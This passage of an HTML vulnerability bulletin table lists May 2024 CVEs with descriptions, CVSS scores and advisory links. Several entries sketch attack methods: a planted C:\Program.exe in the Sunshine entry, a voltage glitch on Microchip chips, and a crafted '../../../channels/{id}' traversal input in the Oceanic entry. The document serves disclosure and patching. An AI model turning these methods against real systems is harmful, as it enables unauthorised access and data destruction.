<td>Authentication Bypass by Spoofing vulnerability in LionScripts IP Blocker Lite allows Functionality Bypass.This issue affects IP Blocker Lite: from n/a through 11.1.1.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-30479&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" target="_blank" title="CVSS V3 Score">5.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-30479" target="_blank">CVE-2024-30479</a><br><a href="https://patchstack.com/database/vulnerability/ip-address-blocker/wordpress-lionscripts-ip-blocker-lite-plugin-11-1-1-bypass-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>LizardByte--Sunshine<br> </td>
<td>Sunshine is a self-hosted game stream host for Moonlight. Users who ran Sunshine versions 0.17.0 through 0.22.2 as a service on Windows may be impacted when terminating the service if an attacked placed a file named `C:\Program.exe`, `C:\Program.bat`, or `C:\Program.cmd` on the user's computer. This attack vector isn't exploitable unless the user has manually loosened ACLs on the system drive. If the user's system locale is not English, then the name of the executable will likely vary. Version 0.23.0 contains a patch for the issue. Some workarounds are available. One may identify and block potentially malicious software executed path interception by using application control tools, like Windows Defender Application Control, AppLocker, or Software Restriction Policies where appropriate. Alternatively, ensure that proper permissions and directory access control are set to deny users the ability to write files to the top-level directory `C:`. Require that all executables be placed in write-protected directories.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-31226&amp;vector=CVSS:3.1/AV:P/AC:H/PR:H/UI:R/S:U/C:L/I:L/A:H" target="_blank" title="CVSS V3 Score">4.9</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-31226" target="_blank">CVE-2024-31226</a><br><a href="https://github.com/LizardByte/Sunshine/commit/93e622342c4f3e9b34f5f265039b6775b8e33a7a" target="_blank">security-advisories@github.com</a><br><a href="https://github.com/LizardByte/Sunshine/pull/2379" target="_blank">security-advisories@github.com</a><br><a href="https://github.com/LizardByte/Sunshine/security/advisories/GHSA-r3rw-mx4q-7vfp" target="_blank">security-advisories@github.com</a></td>
</tr>
<tr>
<td>Matt van Andel--Adventure Journal<br> </td>
<td>Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Matt van Andel Adventure Journal allows Stored XSS.This issue affects Adventure Journal: from n/a through 1.7.2.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-33953&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L" target="_blank" title="CVSS V3 Score">6.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-33953" target="_blank">CVE-2024-33953</a><br><a href="https://patchstack.com/database/vulnerability/adventure-journal/wordpress-adventure-journal-theme-1-7-2-cross-site-scripting-xss-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>Metagauss--EventPrime<br> </td>
<td>Missing Authorization vulnerability in Metagauss EventPrime allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects EventPrime: from n/a through 2.8.6.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2023-33321&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" target="_blank" title="CVSS V3 Score">5.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-33321" target="_blank">CVE-2023-33321</a><br><a href="https://patchstack.com/database/vulnerability/eventprime-event-calendar-management/wordpress-eventprime-plugin-2-8-6-sensitive-data-exposure?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>Metagauss--ProfileGrid<br> </td>
<td>Improper Restriction of Excessive Authentication Attempts vulnerability in Metagauss ProfileGrid allows Removing Important Client Functionality.This issue affects ProfileGrid : from n/a through 5.8.2.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-32774&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L" target="_blank" title="CVSS V3 Score">4.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-32774" target="_blank">CVE-2024-32774</a><br><a href="https://patchstack.com/database/vulnerability/profilegrid-user-profiles-groups-and-communities/wordpress-profilegrid-plugin-5-8-2-group-members-limit-bypass-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>Microchip--SAME70<br> </td>
<td>A voltage glitch during the startup of EEFC NVM controllers on Microchip SAM E70/S70/V70/V71 microcontrollers allows access to the memory bus via the debug interface even if the security bit is set.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4760&amp;vector=CVSS:3.1/AV:P/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">6.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4760" target="_blank">CVE-2024-4760</a><br><a href="https://www.0x01team.com/hw_security/bypassing-microchip-atmel-sam-e70-s70-v70-v71-security/" target="_blank">dc3f6da9-85b5-4a73-84a2-2ec90b40fca5</a></td>
</tr>
<tr>
<td>Microsoft--.NET 7.0<br> </td>
<td>Visual Studio Denial of Service Vulnerability</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-30046&amp;vector=CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H" target="_blank" title="CVSS V3 Score">5.9</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-30046" target="_blank">CVE-2024-30046</a><br><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-30046" target="_blank">secure@microsoft.com</a></td>
</tr>
<tr>
<td>Microsoft--.NET 8.0<br> </td>
<td>.NET and Visual Studio Remote Code Execution Vulnerability</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-30045&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L" target="_blank" title="CVSS V3 Score">6.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-30045" target="_blank">CVE-2024-30045</a><br><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-30045" target="_blank">secure@microsoft.com</a></td>
</tr>
<tr>
<td>Microsoft--Azure Migrate<br> </td>
<td>Azure Migrate Cross-Site Scripting Vulnerability</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-30053&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" target="_blank" title="CVSS V3 Score">6.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-30053" target="_blank">CVE-2024-30053</a><br><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-30053" target="_blank">secure@microsoft.com</a></td>
</tr>
<tr>
<td>Microsoft--Microsoft Bing Search for iOS<br> </td>
<td>Microsoft Bing Search Spoofing Vulnerability</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-30041&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N" target="_blank" title="CVSS V3 Score">5.4</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-30041" target="_blank">CVE-2024-30041</a><br><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-30041" target="_blank">secure@microsoft.com</a></td>
</tr>
<tr>
<td>Microsoft--Microsoft Edge (Chromium-based)<br> </td>
<td>Microsoft Edge (Chromium-based) Spoofing Vulnerability</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-30055&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N" target="_blank" title="CVSS V3 Score">5.4</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-30055" target="_blank">CVE-2024-30055</a><br><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-30055" target="_blank">secure@microsoft.com</a></td>
</tr>
<tr>
<td>Microsoft--Microsoft Intune Mobile Application Management<br> </td>
<td>Microsoft Intune for Android Mobile Application Management Tampering Vulnerability</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-30059&amp;vector=CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:L" target="_blank" title="CVSS V3 Score">6.1</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-30059" target="_blank">CVE-2024-30059</a><br><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-30059" target="_blank">secure@microsoft.com</a></td>
</tr>
<tr>
<td>Microsoft--Microsoft SharePoint Enterprise Server 2016<br> </td>
<td>Microsoft SharePoint Server Information Disclosure Vulnerability</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-30043&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" target="_blank" title="CVSS V3 Score">6.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-30043" target="_blank">CVE-2024-30043</a><br><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-30043" target="_blank">secure@microsoft.com</a></td>
</tr>
<tr>
<td>Microsoft--PowerBI-client JS SDK<br> </td>
<td>Microsoft Power BI Client JavaScript SDK Information Disclosure Vulnerability</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-30054&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" target="_blank" title="CVSS V3 Score">6.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-30054" target="_blank">CVE-2024-30054</a><br><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-30054" target="_blank">secure@microsoft.com</a></td>
</tr>
<tr>
<td>Microsoft--Windows 10 Version 1809<br> </td>
<td>Windows Mobile Broadband Driver Remote Code Execution Vulnerability</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-29997&amp;vector=CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">6.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-29997" target="_blank">CVE-2024-29997</a><br><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-29997" target="_blank">secure@microsoft.com</a></td>
</tr>
<tr>
<td>Microsoft--Windows 10 Version 1809<br> </td>
<td>Windows Mobile Broadband Driver Remote Code Execution Vulnerability</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-29998&amp;vector=CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">6.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-29998" target="_blank">CVE-2024-29998</a><br><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-29998" target="_blank">secure@microsoft.com</a></td>
</tr>
<tr>
<td>Microsoft--Windows 10 Version 1809<br> </td>
<td>Windows Mobile Broadband Driver Remote Code Execution Vulnerability</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-29999&amp;vector=CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">6.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-29999" target="_blank">CVE-2024-29999</a><br><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-29999" target="_blank">secure@microsoft.com</a></td>
</tr>
<tr>
<td>Microsoft--Windows 10 Version 1809<br> </td>
<td>Windows Mobile Broadband Driver Remote Code Execution Vulnerability</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-30000&amp;vector=CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">6.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-30000" target="_blank">CVE-2024-30000</a><br><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-30000" target="_blank">secure@microsoft.com</a></td>
</tr>
<tr>
<td>Microsoft--Windows 10 Version 1809<br> </td>
<td>Windows Mobile Broadband Driver Remote Code Execution Vulnerability</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-30001&amp;vector=CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">6.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-30001" target="_blank">CVE-2024-30001</a><br><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-30001" target="_blank">secure@microsoft.com</a></td>
</tr>
<tr>
<td>Microsoft--Windows 10 Version 1809<br> </td>
<td>Windows Mobile Broadband Driver Remote Code Execution Vulnerability</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-30002&amp;vector=CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">6.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-30002" target="_blank">CVE-2024-30002</a><br><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-30002" target="_blank">secure@microsoft.com</a></td>
</tr>
<tr>
<td>Microsoft--Windows 10 Version 1809<br> </td>
<td>Windows Mobile Broadband Driver Remote Code Execution Vulnerability</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-30003&amp;vector=CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">6.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-30003" target="_blank">CVE-2024-30003</a><br><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-30003" target="_blank">secure@microsoft.com</a></td>
</tr>
<tr>
<td>Microsoft--Windows 10 Version 1809<br> </td>
<td>Windows Mobile Broadband Driver Remote Code Execution Vulnerability</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-30004&amp;vector=CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">6.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-30004" target="_blank">CVE-2024-30004</a><br><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-30004" target="_blank">secure@microsoft.com</a></td>
</tr>
<tr>
<td>Microsoft--Windows 10 Version 1809<br> </td>
<td>Windows Mobile Broadband Driver Remote Code Execution Vulnerability</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-30005&amp;vector=CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">6.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-30005" target="_blank">CVE-2024-30005</a><br><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-30005" target="_blank">secure@microsoft.com</a></td>
</tr>
<tr>
<td>Microsoft--Windows 10 Version 1809<br> </td>
<td>Windows Mobile Broadband Driver Remote Code Execution Vulnerability</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-30012&amp;vector=CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">6.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-30012" target="_blank">CVE-2024-30012</a><br><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-30012" target="_blank">secure@microsoft.com</a></td>
</tr>
<tr>
<td>Microsoft--Windows 10 Version 1809<br> </td>
<td>Windows Mobile Broadband Driver Remote Code Execution Vulnerability</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-30021&amp;vector=CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">6.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-30021" target="_blank">CVE-2024-30021</a><br><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-30021" target="_blank">secure@microsoft.com</a></td>
</tr>
<tr>
<td>Microsoft--Windows 10 Version 1809<br> </td>
<td>Windows DWM Core Library Information Disclosure Vulnerability</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-30008&amp;vector=CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" target="_blank" title="CVSS V3 Score">5.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-30008" target="_blank">CVE-2024-30008</a><br><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-30008" target="_blank">secure@microsoft.com</a></td>
</tr>
<tr>
<td>Microsoft--Windows 10 Version 1809<br> </td>
<td>Windows Cryptographic Services Information Disclosure Vulnerability</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-30016&amp;vector=CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" target="_blank" title="CVSS V3 Score">5.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-30016" target="_blank">CVE-2024-30016</a><br><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-30016" target="_blank">secure@microsoft.com</a></td>
</tr>
<tr>
<td>Microsoft--Windows 10 Version 1809<br> </td>
<td>Windows Cloud Files Mini Filter Driver Information Disclosure Vulnerability</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-30034&amp;vector=CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" target="_blank" title="CVSS V3 Score">5.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-30034" target="_blank">CVE-2024-30034</a><br><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-30034" target="_blank">secure@microsoft.com</a></td>
</tr>
<tr>
<td>Microsoft--Windows 10 Version 1809<br> </td>
<td>Windows Remote Access Connection Manager Information Disclosure Vulnerability</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-30039&amp;vector=CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" target="_blank" title="CVSS V3 Score">5.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-30039" target="_blank">CVE-2024-30039</a><br><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-30039" target="_blank">secure@microsoft.com</a></td>
</tr>
<tr>
<td>Microsoft--Windows 10 Version 1809<br> </td>
<td>Windows Mark of the Web Security Feature Bypass Vulnerability</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-30050&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L" target="_blank" title="CVSS V3 Score">5.4</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-30050" target="_blank">CVE-2024-30050</a><br><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-30050" target="_blank">secure@microsoft.com</a></td>
</tr>
<tr>
<td>Microsoft--Windows Server 2019<br> </td>
<td>Windows Hyper-V Denial of Service Vulnerability</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-30011&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" target="_blank" title="CVSS V3 Score">6.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-30011" target="_blank">CVE-2024-30011</a><br><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-30011" target="_blank">secure@microsoft.com</a></td>
</tr>
<tr>
<td>Microsoft--Windows Server 2019<br> </td>
<td>DHCP Server Service Denial of Service Vulnerability</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-30019&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" target="_blank" title="CVSS V3 Score">6.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-30019" target="_blank">CVE-2024-30019</a><br><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-30019" target="_blank">secure@microsoft.com</a></td>
</tr>
<tr>
<td>Microsoft--Windows Server 2019<br> </td>
<td>Windows Deployment Services Information Disclosure Vulnerability</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-30036&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" target="_blank" title="CVSS V3 Score">6.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-30036" target="_blank">CVE-2024-30036</a><br><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-30036" target="_blank">secure@microsoft.com</a></td>
</tr>
<tr>
<td>MongoDB Inc--MongoDB Server<br> </td>
<td>An unauthenticated user can trigger a fatal assertion in the server while generating ftdc diagnostic metrics due to attempting to build a BSON object that exceeds certain memory sizes. This issue affects MongoDB Server v5.0 versions prior to and including 5.0.16 and MongoDB Server v6.0 versions prior to and including 6.0.5.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-3374&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" target="_blank" title="CVSS V3 Score">5.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-3374" target="_blank">CVE-2024-3374</a><br><a href="https://jira.mongodb.org/browse/SERVER-75601" target="_blank">cna@mongodb.com</a></td>
</tr>
<tr>
<td>N/A--N/A<br> </td>
<td>The 'WordPress RSS Aggregator' WordPress Plugin, versions &lt; 4.23.9 are affected by a Cross-Site Scripting (XSS) vulnerability due to the lack of sanitization of the  'notice_id'  GET parameter.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4860&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N" target="_blank" title="CVSS V3 Score">5.4</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4860" target="_blank">CVE-2024-4860</a><br><a href="https://www.tenable.com/security/research/tra-2024-16" target="_blank">vulnreport@tenable.com</a></td>
</tr>
<tr>
<td>Nathan Vonnahme--Configure Login Timeout<br> </td>
<td>Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Nathan Vonnahme Configure Login Timeout allows Stored XSS.This issue affects Configure Login Timeout: from n/a through 1.0.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-34419&amp;vector=CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L" target="_blank" title="CVSS V3 Score">5.9</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34419" target="_blank">CVE-2024-34419</a><br><a href="https://patchstack.com/database/vulnerability/configure-login-timeout/wordpress-configure-login-timeout-plugin-1-0-cross-site-scripting-xss-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>Ninja Team--Filebird<br> </td>
<td>Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Ninja Team Filebird.This issue affects Filebird: from n/a through 5.6.3.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-35166&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" target="_blank" title="CVSS V3 Score">5.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-35166" target="_blank">CVE-2024-35166</a><br><a href="https://patchstack.com/database/vulnerability/filebird/wordpress-filebird-wordpress-media-library-folders-file-manager-plugin-5-6-3-sensitive-data-exposure-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>OCDI--One Click Demo Import<br> </td>
<td>Deserialization of Untrusted Data vulnerability in OCDI One Click Demo Import.This issue affects One Click Demo Import: from n/a through 3.2.0.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-34433&amp;vector=CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N" target="_blank" title="CVSS V3 Score">4.4</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34433" target="_blank">CVE-2024-34433</a><br><a href="https://patchstack.com/database/vulnerability/one-click-demo-import/wordpress-one-click-demo-import-plugin-3-2-0-php-object-injection-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>OceanicJS--Oceanic<br> </td>
<td>Oceanic is a NodeJS library for interfacing with Discord. Prior to version 1.10.4, input to functions such as `Client.rest.channels.removeBan` is not url-encoded, resulting in specially crafted input such as `../../../channels/{id}` being normalized into the url `/api/v10/channels/{id}`, and deleting a channel rather than removing a ban. Version 1.10.4 fixes this issue. Some workarounds are available. One may sanitize user input, ensuring strings are valid for the purpose they are being used for. One may also encode input with `encodeURIComponent` before providing it to the library.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-34712&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N" target="_blank" title="CVSS V3 Score">6.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34712" target="_blank">CVE-2024-34712</a><br><a href="https://github.com/OceanicJS/Oceanic/commit/8bf8ee8373b8c565fbdbf70a609aba4fbc1a1ffe" target="_blank">security-advisories@github.com</a><br><a href="https://github.com/OceanicJS/Oceanic/security/advisories/GHSA-5h5v-hw44-f6gg" target="_blank">security-advisories@github.com</a></td>
</tr>
<tr>
<td>OpenText--iManager<br> </td>
<td>Path Traversal found in OpenTextâ„¢ iManager 3.2.6.0200. This can lead to privilege escalation or file disclosure.</td>
<td>2024-05-15</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-3484&amp;vector=CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" target="_blank" title="CVSS V3 Score">5.7</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-3484" target="_blank">CVE-2024-3484</a><br><a href="https://www.netiq.com/documentation/imanager-32/imanager326_patch3_hf1_releasenotes/data/imanager326_patch3_hf1_releasenotes.html" target="_blank">security@opentext.com</a></td>
</tr>
<tr>
<td>OpenText--iManager<br> </td>
<td>Server Side Request Forgery vulnerability has been discovered in OpenTextâ„¢ iManager 3.2.6.0200. This could lead to senstive information disclosure.</td>
<td>2024-05-15</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-3485&amp;vector=CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:N/A:N" target="_blank" title="CVSS V3 Score">5.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-3485" target="_blank">CVE-2024-3485</a><br><a href="https://www.netiq.com/documentation/imanager-32/imanager326_patch3_hf1_releasenotes/data/imanager326_patch3_hf1_releasenotes.html" target="_blank">security@opentext.com</a></td>
</tr>
<tr>
<td>OpenText--iManager<br> </td>
<td>File Upload vulnerability in unauthenticated session found in OpenTextâ„¢ iManager 3.2.6.0200. The vulnerability could allow ant attacker to upload a file without authentication.</td>
<td>2024-05-15</td>
